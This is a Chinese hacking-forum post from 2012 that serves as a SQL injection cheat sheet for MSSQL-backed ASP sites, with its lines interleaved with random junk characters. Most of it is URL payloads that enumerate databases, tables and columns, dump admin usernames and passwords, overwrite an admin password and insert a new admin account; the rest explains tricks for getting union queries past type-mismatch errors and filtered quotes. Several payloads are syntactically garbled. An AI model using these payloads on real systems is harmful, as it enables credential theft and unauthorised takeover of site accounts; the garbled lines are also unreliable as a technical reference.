找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2405|回复: 0
打印 上一主题 下一主题

MSSQL用union查询爆数据

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:26:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
爆库:
; a* d6 ^$ x( q+ M8 }" uhttp://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.--8 z% p) V8 R5 B- E- }
SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.
- `$ ]* {3 y) R) z- d. r- J( E+ r+ l爆下一个库:% O9 a. _8 }. r& o  F: r9 B1 ~
http://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE TABLE_NAME NOT IN ('库名')--
2 v$ W0 i$ _. o4 V6 \# R2 ^$ S( U1 Q' _3 _
爆表:
1 W) o4 O' ?$ B6 ?1 {3 q3 a$ vhttp://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
/ a" _+ u! @+ n& m4 T- {" V: G; i( M. t: y" y
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES.% V: Y. j4 l: g( h( U
2 O. U6 |. N4 R7 p5 i+ r. J
爆下一个表
: A# q2 f5 i# o. \: Mhttp://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
( ]& u9 `; H( M0 |6 f( ^% K/ T( K1 G6 \3 U2 Y+ P' F
http://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%login%'--; U- M$ q0 g% i, P- }

$ z; ^+ c2 f  G& f* W* N" F
$ D3 d# j' W9 V3 n
4 n  D# _8 }4 n& K. R# h爆字段:
) G: N- P7 f; D, k8 Fhttp://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--0 ?# }. L+ u  j8 h6 Q# m; P, _

( j4 x" C8 S; |; X4 W爆下一个字段/ q) R& R& {; g4 n
http://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--* t5 U3 f( [+ a0 c/ r" A4 s

* w' P7 d7 I& khttp://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
4 t/ S1 p- W3 l/ q, D+ ^
4 k  i+ Y& R) W: p# ?. V) V! \( l% q  I5 G* b  |# U
爆字段里的内容* f1 Z/ O7 H8 ?1 A
http://duck/index.asp.id=10 UNION SELECT TOP 1 login_name FROM admin_login--
6 w0 q& y; _* I- t5 N. @9 I! [! X  W; l; N
http://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
, o! h6 W, n( |$ Y
* b! W' `3 R) d  S# Chttp://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
: U: L, i9 _2 K, {, k% i0 r* d) e5 _0 O! N9 |6 ~  l
http://duck/index.asp.id=10 UNION SELECT TOP 1 convert(int,password.morpheus.) FROM admin_login where login_name='trinity'--
1 B2 ]/ s. O- R" {2 B& u. U6 F- P/ v3 A0 M) q2 [
更新字段里的内容
; A6 V" n) }& x4 h; |http://duck/index.asp.id=10; UPDATE .admin_login. SET .password. = .newpas5. WHERE login_name='neo'--
: ^5 R3 ~) h7 H/ b* x" A. S% t5 q% ]- Z3 [+ V1 T4 k
http://duck/index.asp.id=10; INSERT INTO .admin_login. (.login_id.,.login_name.,.password.,.details.) VALUES (666,.neo2.,.newpas5.,.NA.)--
" j0 H. T4 z, [4 o( n: p9 J0 d
4 @; F% ~2 k3 l
, w2 x. {9 P6 W& L/ v: T' o' B& J0 a, M) N& c8 s: d7 t
        在注射的时候,access和mysql环境下,我们通常是通过union来获取数据的。但是遇到mssql环境,union很多时候都行不通,如果页面不报错,openrowset不可用,往往时候就只有暴力了。这样多不好,大家都是文明人,怎么可以用这么野蛮的手段呢?研究了一下,mssql中的union选择主要有以下几个方面的限制。
9 R) a  e$ D% ^0 e) [+ ~  g9 G    第一个是varchar/nvarchar和int类型的字段union到一起会强制转换出错。这个可以去看superhei大牛N久以前的文章,用and 1=2 把union前面的结果集置空就可以解决了。# Z2 v( ~& k9 Q' I+ r! ~9 l4 t/ ^
    第二个是当前面语句选择的字段有text、ntext 或者image格式的时候,不能用DISTINCT 方式来选择,而带union的语句必然是以DISTINCT 方式来选择的。这也是为什么很多搜索型的注射点可以用union猜解的原因,因为搜索点的语句很少会选到前面三种格式的字段。Image是二进制格式,一般不会出现在需要回显的sql语句中。这种限制前段时间也看到牛淫给出了解决方法,union后面跟一个all,即union all就搞定了。真是神奇啊,牛淫就是牛淫。! M' }' Z. G9 `: S% C3 j
    最后还有一个限制是text/ntext 与 int类型的字段 union到一起时并不兼容,会报操作数类型冲突的错误,就算用1=2把union前面语句的结果置空也一样。前几天突然想到,union的时候我们经常用1,2,3……之类的常数来补齐相差的列数。这时候后面的语句选择的都是int类型的字段,遇到前面有text/ntext的字段当然会出错,如果加上引号呢,即'1’,'2’,'3’……的形式?这时候后面的字段都是char或者varchar的类型了,应该就不会出错了。如果注射点过滤了引号怎么办?因为mssql对16进制格式的支持不是太好,很多地方用16进制必须declare――set,那就用char吧,即and 1=2 union all select char(49),char(50)……的形式。
1 c& t& }8 l8 O% N8 e, A$ q% ?5 M$ N& F1 K8 A) b. U7 [
突了了大部份限制的语句
9 V, K$ W0 p+ |. h9 x/ kand 1=2 union all select char(49),char(50),null,null;--
; K% ^: _$ W4 L4 B6 {6 [4 a) g
- q% O& h2 n$ q, \7 \
- R" k$ I5 }7 Vnull也可以正常执行,不过没有回显,不好判断回显的列数。
5 _# S1 J  V+ v3 t0 ~一般union遇到问题都是有text或者ntext字段,image的很少遇到
9 c4 _( e3 {" }* B: H8 K' C
/ B1 R9 [2 n- U( P# W可以先null完之后再一个个用1,2,3,4代替,这样就能逼出image类型的列鸟0 N: t$ I, ~) f3 ?, M
0 p9 C5 K$ S$ U2 f& w: Z! `

0 F; G6 Y" F6 |! b2 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表